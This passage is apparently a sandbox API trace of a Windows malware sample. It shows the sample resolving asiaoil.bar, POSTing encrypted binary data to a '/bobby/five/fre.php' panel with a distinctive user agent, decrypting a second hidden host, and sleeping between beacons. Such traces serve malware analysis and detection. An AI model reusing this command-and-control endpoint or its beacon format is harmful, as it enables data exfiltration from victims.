LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0311.334] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0311.334] GetProcessHeap () returned 0x740000 [0311.334] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdc8 [0311.334] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2b0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bdf0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0311.453] GetProcessHeap () returned 0x740000 [0311.453] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b610 [0311.453] socket (af=2, type=1, protocol=6) returned 0x2fc [0311.453] connect (s=0x2fc, name=0x75c2b0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0311.480] FreeAddrInfoW (pAddrInfo=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2b0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bdf0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0311.481] GetProcessHeap () returned 0x740000 [0311.481] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75cee0 [0311.481] GetProcessHeap () returned 0x740000 [0311.481] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0311.482] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0311.483] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0311.483] GetProcessHeap () returned 0x740000 [0311.483] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0311.483] GetProcessHeap () returned 0x740000 [0311.484] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0311.484] GetProcessHeap () returned 0x740000 [0311.484] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763938 [0311.484] GetProcessHeap () returned 0x740000 [0311.484] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0311.485] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0311.486] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0311.486] GetProcessHeap () returned 0x740000 [0311.486] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0311.486] GetProcessHeap () returned 0x740000 [0311.487] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0311.487] send (s=0x2fc, buf=0x747928*, len=243, flags=0) returned 243 [0311.488] send (s=0x2fc, buf=0x761fd0*, len=159, flags=0) returned 159 [0311.488] GetProcessHeap () returned 0x740000 [0311.488] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0311.488] recv (in: s=0x2fc, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 573 [0311.577] GetProcessHeap () returned 0x740000 [0311.578] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0311.578] GetProcessHeap () returned 0x740000 [0311.578] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763938 | out: hHeap=0x740000) returned 1 [0311.578] GetProcessHeap () returned 0x740000 [0311.578] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0311.578] GetProcessHeap () returned 0x740000 [0311.579] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75cee0 | out: hHeap=0x740000) returned 1 [0311.579] closesocket (s=0x2fc) returned 0 [0311.579] GetProcessHeap () returned 0x740000 [0311.580] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b610 | out: hHeap=0x740000) returned 1 [0311.580] GetProcessHeap () returned 0x740000 [0311.580] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765898 | out: hHeap=0x740000) returned 1 [0311.580] GetProcessHeap () returned 0x740000 [0311.581] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763b30 | out: hHeap=0x740000) returned 1 [0311.581] GetProcessHeap () returned 0x740000 [0311.581] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0311.582] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x614) returned 0x2fc [0311.584] Sleep (dwMilliseconds=0xea60) [0311.586] GetProcessHeap () returned 0x740000 [0311.586] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763ed8 [0311.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.590] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0311.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.597] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d7e8) returned 1 [0311.606] GetProcessHeap () returned 0x740000 [0311.606] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0311.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.608] CryptImportKey (in: hProv=0x75d7e8, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d368) returned 1 [0311.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.609] CryptSetKeyParam (hKey=0x74d368, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0311.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.610] CryptSetKeyParam (hKey=0x74d368, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0311.610] GetProcessHeap () returned 0x740000 [0311.611] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0311.612] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.613] CryptDecrypt (in: hKey=0x74d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763ed8, pdwDataLen=0x19fcfc | out: pbData=0x763ed8, pdwDataLen=0x19fcfc) returned 1 [0311.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.669] CryptDestroyKey (hKey=0x74d368) returned 1 [0311.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.671] CryptReleaseContext (hProv=0x75d7e8, dwFlags=0x0) returned 1 [0311.671] GetProcessHeap () returned 0x740000 [0311.671] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765f10 [0311.672] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0311.672] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0311.673] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0311.673] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0311.674] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0311.675] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0311.675] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0311.676] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0311.676] GetProcessHeap () returned 0x740000 [0311.676] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c020 [0311.676] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0311.676] GetProcessHeap () returned 0x740000 [0311.676] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c020 | out: hHeap=0x740000) returned 1 [0311.677] GetProcessHeap () returned 0x740000 [0311.677] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765f10 | out: hHeap=0x740000) returned 1 [0311.677] GetProcessHeap () returned 0x740000 [0311.677] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763ed8 | out: hHeap=0x740000) returned 1 [0311.678] GetProcessHeap () returned 0x740000 [0311.678] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763f20 [0311.678] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.679] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0311.684] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.685] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d540) returned 1 [0311.694] GetProcessHeap () returned 0x740000 [0311.694] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758478 [0311.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.695] CryptImportKey (in: hProv=0x75d540, pbData=0x758478, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d368) returned 1 [0311.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.696] CryptSetKeyParam (hKey=0x74d368, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0311.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.697] CryptSetKeyParam (hKey=0x74d368, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0311.697] GetProcessHeap () returned 0x740000 [0311.698] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758478 | out: hHeap=0x740000) returned 1 [0311.699] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.699] CryptDecrypt (in: hKey=0x74d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763f20, pdwDataLen=0x19fcfc | out: pbData=0x763f20, pdwDataLen=0x19fcfc) returned 1 [0311.699] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.700] CryptDestroyKey (hKey=0x74d368) returned 1 [0311.700] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0311.701] CryptReleaseContext (hProv=0x75d540, dwFlags=0x0) returned 1 [0311.701] GetProcessHeap () returned 0x740000 [0311.701] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765ce8 [0311.701] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0311.702] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0311.702] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0311.703] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0311.703] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0311.703] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0311.704] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0311.704] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0311.704] GetProcessHeap () returned 0x740000 [0311.704] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bf58 [0311.704] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c208*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0311.706] GetProcessHeap () returned 0x740000 [0311.706] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b4f0 [0311.706] socket (af=2, type=1, protocol=6) returned 0x300 [0311.706] connect (s=0x300, name=0x75c208*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0311.729] FreeAddrInfoW (pAddrInfo=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c208*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0311.729] GetProcessHeap () returned 0x740000 [0311.729] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d7e8 [0311.729] GetProcessHeap () returned 0x740000 [0311.729] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0311.730] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0311.731] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0311.731] GetProcessHeap () returned 0x740000 [0311.731] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0311.731] GetProcessHeap () returned 0x740000 [0311.732] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0311.732] GetProcessHeap () returned 0x740000 [0311.732] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763740 [0311.732] GetProcessHeap () returned 0x740000 [0311.732] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0311.733] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0311.733] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0311.733] GetProcessHeap () returned 0x740000 [0311.733] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0311.733] GetProcessHeap () returned 0x740000 [0311.734] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0311.747] send (s=0x300, buf=0x747928*, len=243, flags=0) returned 243 [0311.747] send (s=0x300, buf=0x761fd0*, len=159, flags=0) returned 159 [0311.748] GetProcessHeap () returned 0x740000 [0311.748] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0311.748] recv (in: s=0x300, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 567 [0312.202] GetProcessHeap () returned 0x740000 [0312.203] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0312.203] GetProcessHeap () returned 0x740000 [0312.203] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763740 | out: hHeap=0x740000) returned 1 [0312.203] GetProcessHeap () returned 0x740000 [0312.204] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0312.204] GetProcessHeap () returned 0x740000 [0312.204] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d7e8 | out: hHeap=0x740000) returned 1 [0312.204] closesocket (s=0x300) returned 0 [0312.205] GetProcessHeap () returned 0x740000 [0312.205] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4f0 | out: hHeap=0x740000) returned 1 [0312.205] GetProcessHeap () returned 0x740000 [0312.205] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765ce8 | out: hHeap=0x740000) returned 1 [0312.205] GetProcessHeap () returned 0x740000 [0312.205] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763f20 | out: hHeap=0x740000) returned 1 [0312.206] GetProcessHeap () returned 0x740000 [0312.206] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bf58 | out: hHeap=0x740000) returned 1 [0312.206] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x97c) returned 0x300 [0312.208] Sleep (dwMilliseconds=0xea60) [0312.215] GetProcessHeap () returned 0x740000 [0312.215] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763860 [0312.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.218] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0312.227] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.228] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d298) returned 1 [0312.237] GetProcessHeap () returned 0x740000 [0312.237] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0312.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.238] CryptImportKey (in: hProv=0x75d298, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0312.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.239] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0312.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.240] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0312.240] GetProcessHeap () returned 0x740000 [0312.241] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0312.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.243] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763860, pdwDataLen=0x19fcfc | out: pbData=0x763860, pdwDataLen=0x19fcfc) returned 1 [0312.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.245] CryptDestroyKey (hKey=0x74d768) returned 1 [0312.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.271] CryptReleaseContext (hProv=0x75d298, dwFlags=0x0) returned 1 [0312.271] GetProcessHeap () returned 0x740000 [0312.271] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x7669d8 [0312.272] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0312.272] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0312.273] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0312.273] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0312.274] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0312.274] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0312.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0312.275] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0312.275] GetProcessHeap () returned 0x740000 [0312.275] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bfa8 [0312.275] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0312.276] GetProcessHeap () returned 0x740000 [0312.276] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bfa8 | out: hHeap=0x740000) returned 1 [0312.277] GetProcessHeap () returned 0x740000 [0312.277] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7669d8 | out: hHeap=0x740000) returned 1 [0312.277] GetProcessHeap () returned 0x740000 [0312.277] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763860 | out: hHeap=0x740000) returned 1 [0312.277] GetProcessHeap () returned 0x740000 [0312.277] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763f20 [0312.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.279] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0312.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.284] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75cc38) returned 1 [0312.293] GetProcessHeap () returned 0x740000 [0312.293] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758478 [0312.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.294] CryptImportKey (in: hProv=0x75cc38, pbData=0x758478, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d368) returned 1 [0312.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.295] CryptSetKeyParam (hKey=0x74d368, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0312.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.296] CryptSetKeyParam (hKey=0x74d368, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0312.296] GetProcessHeap () returned 0x740000 [0312.296] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758478 | out: hHeap=0x740000) returned 1 [0312.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.298] CryptDecrypt (in: hKey=0x74d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763f20, pdwDataLen=0x19fcfc | out: pbData=0x763f20, pdwDataLen=0x19fcfc) returned 1 [0312.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.300] CryptDestroyKey (hKey=0x74d368) returned 1 [0312.300] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.301] CryptReleaseContext (hProv=0x75cc38, dwFlags=0x0) returned 1 [0312.301] GetProcessHeap () returned 0x740000 [0312.301] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765670 [0312.302] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0312.302] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0312.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0312.304] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0312.305] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0312.305] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0312.306] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0312.309] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0312.309] GetProcessHeap () returned 0x740000 [0312.309] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdc8 [0312.309] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: 